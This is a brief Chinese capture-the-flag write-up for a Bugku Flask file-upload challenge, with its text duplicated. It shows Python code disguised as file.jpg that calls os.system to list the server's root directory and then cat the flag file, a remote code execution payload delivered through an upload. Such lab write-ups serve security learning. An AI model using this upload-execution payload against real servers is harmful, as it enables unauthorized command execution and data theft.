Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码
import os
os.system('ls / ')
上传后查看源代码,找到flag文件夹

修改代码
import os
os.system('cat /flag ')


查看源代码,提示用python返回结果

在file.jpg中写python代码
import os
os.system('ls / ')
上传后查看源代码,找到flag文件夹

修改代码
import os
os.system('cat /flag ')
